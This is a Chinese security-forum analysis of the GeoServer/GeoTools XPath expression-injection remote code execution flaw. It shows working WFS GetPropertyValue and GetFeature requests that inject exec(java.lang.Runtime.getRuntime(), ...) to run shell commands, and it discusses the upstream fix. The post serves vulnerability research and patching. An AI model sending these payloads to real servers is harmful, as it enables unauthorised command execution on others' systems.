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
<p blockindex=56>根据官网教程还可以使用POST请求</p>
<pre blockindex=57><code class="hljs language-http">POST /geoserver/wfs HTTP/1.1
<span class=hljs-attribute>Host</span><span class=hljs-punctuation>: </span>127.0.0.1:8080
<span class=hljs-attribute>User-Agent</span><span class=hljs-punctuation>: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 ldwk
<span class=hljs-attribute>Accept</span><span class=hljs-punctuation>: </span>*/* Accept-Language: en-US,en;q=0.5Content-Length: 329
&lt;wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0' valueReference='exec(java.lang.Runtime.getRuntime(),"touch /tmp/pwn")'&gt;&lt;wfs:Query typeNames='topp:states'/&gt;
&lt;/wfs:GetPropertyValue&gt;
</code></pre>
<h2 blockindex=58>GetFeature</h2>
<p blockindex=59>同理进行测试,得到传入的参数是<code>propertyName</code></p>
<pre blockindex=60><code class="hljs language-php">http:<span class=hljs-comment>//192.168.79.147:8080/geoserver/wfs?service=wfs&amp;version=2.0.0&amp;request=GetFeature&amp;typeNames=topp:states&amp;featureID=feature&amp;propertyName=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/pwn2')</span>
</code></pre>
<p blockindex=61>经过调试发现payload被逗号分割截断了传入的xpath变成了<code>exec(java.lang.Runtime.getRuntime()</code>需要换个payload</p>
<h1 blockindex=62>漏洞修复</h1>
<p blockindex=63>GeoServer官方给出的修复方案是更新最新版或者下载补丁包括已修复的 gt-app-schema、gt-complex 和 gt-xsd-core jar 文件似乎只是更新了geotools的依赖</p>
<p blockindex=64>而geotools官方给出的修复是修改对XPath 表达式的处理:<a href=https://github.com/geotools/geotools/commit/fa187593abd5784d4338e7b5fff97eb47ce60b78>https://github.com/geotools/geotools/commit/fa187593abd5784d4338e7b5fff97eb47ce60b78</a></p>
<p blockindex=65>前面提到的Sinks添加了安全检查<code>newSafeContext</code>,例如FeaturePropertyAccessorFactory类的get方法</p>
<p blockindex=66><img src=data:image/png;base64,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
<p blockindex=67>org.geotools.xsd.impl.jxpath.JXPathUtils是新添加的一个类禁止通过 XPath 表达式调用 Java 方法<br>
<img src="data:image/png;base64,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
<h1 blockindex=68>参考:</h1>
<p blockindex=69><a href=https://tttang.com/archive/1771/>https://tttang.com/archive/1771/</a></p>
<p blockindex=70><a href=https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst>https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst</a></p>
<p blockindex=71><a href=https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w</a></p>
<p blockindex=72><a href=https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv</a></p></div></div>
</div>
<div class="post-opt mt-30">
<ul class="list-inline text-muted">
<li>
<i class="fa fa-clock-o"></i>
发表于 2024-07-04 10:53:22
</li>
<li>阅读 ( 502 )</li>
<li>分类:<a href=https://forum.butian.net/community/Vul_analysis target=_blank rel="noopenner noreferrer">漏洞分析</a>
</li>
<li><a href=# class=report_btn data-source_type=article data-source_id=3129 data-toggle=modal data-target=#send_report_model><i class="fa fa-flag-o"></i> 举报</a></li>
</ul>
</div>
</div>
<div class="text-center mt-30 mb-20">
<button id=support-button class="btn btn-success btn-lg mr-5" data-loading-text=加载中... data-source_type=community data-source_id=3129 data-support_num=1> 1 推荐</button>
<button id=collect-button class="btn btn-default btn-lg" data-loading-text=加载中... data-source_type=community data-source_id=3129> 收藏</button>
</div>
</div>
<div class="widget-answers mt-15">
<h2 class="h4 post-title">0 条评论</h2>
<div class=comment>
</div>
<div class="widget-comment-form row mb-20">
<form class=col-md-12>
<div class=form-group>
<textarea id=comment-content name=content placeholder=写下你的评论 class=form-control></textarea>
</div>
</form>
<div class="col-md-12 text-right">
<button type=submit data-token=ds6VKSu9DezurHrlMbBetV3ZA9t3YD3otL0bkTxt data-source_id=3129 data-source_type=community class="btn btn-primary btn-sm ml-10 comment-btn">提交评论</button>
</div>
</div>
<div class=text-center>
</div>
</div>
</div>
<div class="col-xs-12 col-md-3 side" style=display:none>
</div>
</div>
</div>
</div>
<footer id=footer>
<div class=container>
<div class=text-center>
<a href=https://forum.butian.net/>奇安信攻防社区</a><span class=span-line>|</span>
<a href=mailto:butian_report@qianxin.com target=_blank rel="noopenner noreferrer">联系我们</a><span class=span-line>|</span>
<a href=https://forum.butian.net/sitemap>sitemap</a>
</div>
<div class="copyright mt-10">
Copyright © 2013-2023 BUTIAN.NET 版权所有 <a href=https://beian.miit.gov.cn/#/Integrated/index>京ICP备18014330号-2</a>
</div>
</div>
</footer>
<div class="modal fade sf-hidden" id=sendTo_message_model tabindex=-1 role=dialog aria-labelledby=exampleModalLabel>
</div>
<div class="modal fade sf-hidden" id=send_report_model role=dialog aria-labelledby=exampleModalLabel>
</div> <div class="modal fade in sf-hidden" id=payment-qrcode-modal-article-3129 tabindex=-1 role aria-labelledby=exampleModalLabel aria-hidden=false>
</div>
<div style="display:none;position:fixed;top:40%;left:50%;z-index:9999;transform:translate(-50%,-50%);padding:3px 15px;border-radius:8px;background:rgba(120,120,120,0.7);box-shadow:1px 1px 3px 1px rgba(160,160,160,0.6);text-align:center;font-size:12px;color:#fff"></div><div id=windowLoading class="modal fade sf-hidden" tabindex=-1 role=dialog>
</div>
<span id=cnzz_stat_icon_1279782571></span>
<div class="geetest_panel geetest_wind" style=display:none></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha
Reference in New Issue Copy Permalink